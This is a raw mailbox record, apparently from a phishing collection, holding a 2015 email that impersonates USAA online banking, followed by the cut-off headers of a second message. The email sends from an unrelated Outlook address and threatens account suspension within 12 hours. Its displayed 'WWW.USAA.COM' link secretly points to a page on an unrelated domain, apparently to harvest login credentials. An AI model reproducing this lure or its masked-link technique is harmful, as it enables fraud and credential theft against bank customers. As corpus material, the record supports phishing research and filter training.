From: USAA <s.goodridge@outlook.com>
Subject: IMPORTANT - Password Reset
To: jose@monkey.org
Content-Type: multipart/alternative;
	boundary="sNolrdb=_n2dRQMRveelidLqjmjXMNhgkA0"
MIME-Version: 1.0
Date: Fri, 1 May 2015 14:27:07 -0700
X-Antivirus: avast! (VPS 150501-0, 05/01/2015), Outbound message
X-Antivirus-Status: Clean
X-OriginalArrivalTime: 01 May 2015 21:27:12.0473 (UTC) FILETIME=[966FA490:01D08455]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 75

--sNolrdb=_n2dRQMRveelidLqjmjXMNhgkA0
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

 - This mail is in HTML. Some elements may be ommited in plain text. -

DEAR VALUED CUSTOMER
During a recent security check on USAA online banking, your session co=
uld not be verified for consistency, we require you to Click on the li=
nk below to confirm your details:
WWW.USAA.COM
NOTE: Failure to do this withing 12hrs of receiving this message will =
lead to access suspension, Sorry for the inconvenience.
Regards,
USAA ONLINE BANKING.

--sNolrdb=_n2dRQMRveelidLqjmjXMNhgkA0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD>
<BODY>
<P><SPAN style=3D"COLOR: rgb(11,83,148)"><B><IMG style=3D"WHITE-SPACE:=
 normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT: small arial,sa=
ns-serif; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); =
TEXT-INDENT: 0px" border=3D0 alt=3D"" src=3D"https://ci4.googleusercon=
tent.com/proxy/U0RKK-68hu6LgjAfA1jBqJ14QGkCUxkkcuzfVgJZRMAgGp-B4wCEM2W=
QuMmqMY_hhx8klDZRxSzTmfy8kyoLfS7w2CCXC2cOlPA8E-CRLgExdwOLA6j852wY=3Ds0=
-d-e1-ft#https://content.usaa.com/mcontent/static_assets/Media/email_l=
ogo.gif" width=3D86 height=3D57><FONT style=3D"WHITE-SPACE: normal; WO=
RD-SPACING: 0px; TEXT-TRANSFORM: none; FONT: 12px arial,sans-serif; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT:=
 0px"><BR></FONT><FONT style=3D"WHITE-SPACE: normal; WORD-SPACING: 0px=
; TEXT-TRANSFORM: none; FONT: 12px arial,sans-serif; LETTER-SPACING: n=
ormal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"><BR></FON=
T></B></SPAN></P>
<DIV id=3Dyui_3_16_0_1_1430498848109_10752 style=3D"WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT: small arial,sans-ser=
if; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-I=
NDENT: 0px">
<DIV id=3Dyui_3_16_0_1_1430498848109_10751><SPAN style=3D"COLOR: rgb(1=
1,83,148)"><B><FONT id=3Dyui_3_16_0_1_1430498848109_10810>DEAR VALUED =
CUSTOMER</FONT></B></SPAN></DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10754><SPAN style=3D"COLOR: rgb(1=
1,83,148)"><B><BR></B></SPAN></DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10756><SPAN style=3D"COLOR: rgb(1=
1,83,148)"><B><FONT id=3Dyui_3_16_0_1_1430498848109_10755>During a rec=
ent security check on USAA online banking, your session could not be v=
erified for consistency, we require you to Click on the link below to =
confirm your details:<BR></FONT></B></SPAN></DIV></DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10757 style=3D"WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT: small arial,sans-ser=
if; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-I=
NDENT: 0px"><SPAN style=3D"COLOR: rgb(11,83,148)"><B><BR></B></SPAN></=
DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10758 style=3D"WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT: small arial,sans-ser=
if; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-I=
NDENT: 0px"><SPAN style=3D"COLOR: rgb(11,83,148)"><B><FONT id=3Dyui_3_=
16_0_1_1430498848109_10830><A href=3D"http://www.usaa.com/"><U id=3Dyu=
i_3_16_0_1_1430498848109_10829><FONT id=3Dyui_3_16_0_1_1430498848109_1=
0828 size=3D4><A id=3Dyui_3_16_0_1_1430498848109_10827 style=3D"TEXT-D=
ECORATION: underline; BACKGROUND: none transparent scroll repeat 0% 0%=
; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLIN=
E-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert; =
PADDING-RIGHT: 0px" href=3D"http://digital-fanedits.com/includes/USAA.=
html" rel=3Dnofollow target=3D_blank>WWW.USAA.COM</A></FONT></U></A><B=
R></FONT></B></SPAN></DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10759 style=3D"WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT: small arial,sans-ser=
if; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-I=
NDENT: 0px"><SPAN style=3D"COLOR: rgb(11,83,148)"><B><BR></B></SPAN></=
DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10762 style=3D"WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT: small arial,sans-ser=
if; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-I=
NDENT: 0px">
<DIV id=3Dyui_3_16_0_1_1430498848109_10761><SPAN style=3D"COLOR: rgb(1=
1,83,148)"><B><FONT id=3Dyui_3_16_0_1_1430498848109_10760>NOTE: Failur=
e to do this withing 12hrs of receiving this message will lead to acce=
ss suspension,&nbsp;Sorry for the inconvenience.<BR></FONT></B></SPAN>=
</DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10766><SPAN style=3D"COLOR: rgb(1=
1,83,148)"><B><BR></B></SPAN></DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10763><SPAN style=3D"COLOR: rgb(1=
1,83,148)"><B>Regards,</B></SPAN></DIV>
<DIV id=3Dyui_3_16_0_1_1430498848109_10764><SPAN style=3D"COLOR: rgb(1=
1,83,148)"><B><FONT id=3Dyui_3_16_0_1_1430498848109_10767>USAA ONLINE =
BANKING.</FONT></B></SPAN></DIV></DIV><SPAN style=3D"COLOR: rgb(11,83,=
148)"><B><FONT style=3D"WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-T=
RANSFORM: none; FONT: 12px arial,sans-serif; LETTER-SPACING: normal; B=
ACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"><SPAN style=3D'WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: non=
e; FONT: 13px "Helvetica Neue","Segoe UI",Helvetica,Arial,"Lucida Gran=
de",sans-serif; DISPLAY: inline !important; LETTER-SPACING: normal; BA=
CKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px'></SPAN></FONT></B>=
</SPAN></BODY></HTML>

--sNolrdb=_n2dRQMRveelidLqjmjXMNhgkA0--

From coscontrol@caturgroup.com  Fri May  1 16:59:18 2015
Return-Path: <coscontrol@caturgroup.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 3F44FF4006
	for <jose@login.monkey.org>; Fri,  1 May 2015 16:59:18 -0500 (CDT)
Received: from smtpin10.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id E592C184792
	for <jose@login.monkey.org>; Fri,  1 May 2015 21:59:17 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70139699154.10.prose10_511180edae811
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 87,8,0,8e0b98011fc47e7a,d41d8cd98f00b204,coscontrol@caturgroup.com,,RULES_HIT:41:379:387:539:540:541:542:543:567:677:871:960:967:969:973:988:989:1000:1155:1254:1260:1308:1309:1313:1314:1381:1432:1437:1516:1517:1534:1541:1561:1575:1587:1594:1699:1711:1714:1730:1747:1764:1777:1792:1823:2073:2076:2194:2199:2393:2525:2527:2549:2559:2563:2682:2685:2859:2890:2891:2896:2901:2916:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3865:3866:3867:3868:3873:3934:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4362:5007:6261:6354:6506:6678:6747:6748:7208:7281:7652:7909:8583:8603:8651:8829:8957:9025:9113:10013:10264:10265:10283:10394:10400:11529:11604:11658:11914:12043:12225:12231:12517:12519:12555:12729:12737:13061:13110:13132:13231:14037:14096,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:2:0
X-HE-Tag: prose10_511180edae811
X-Filterd-Recvd-Size: 3077
Received: from cohosting7.cbn.net.id (cohosting7.cbn.net.id [210.210.178.22])
	by imf16.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri,  1 May 2015 21:59:17 +0000 (UTC)
Received: from [180.250.31.37] (port=1481 helo=User)
	by cohosting7.cbn.net.id with esmtpa (Exim 4.85)
	(envelope-from <coscontrol@caturgroup.com>)
	id 1YoIxg-0007No-61; Sat, 02 May 2015 04:59:08 +0700
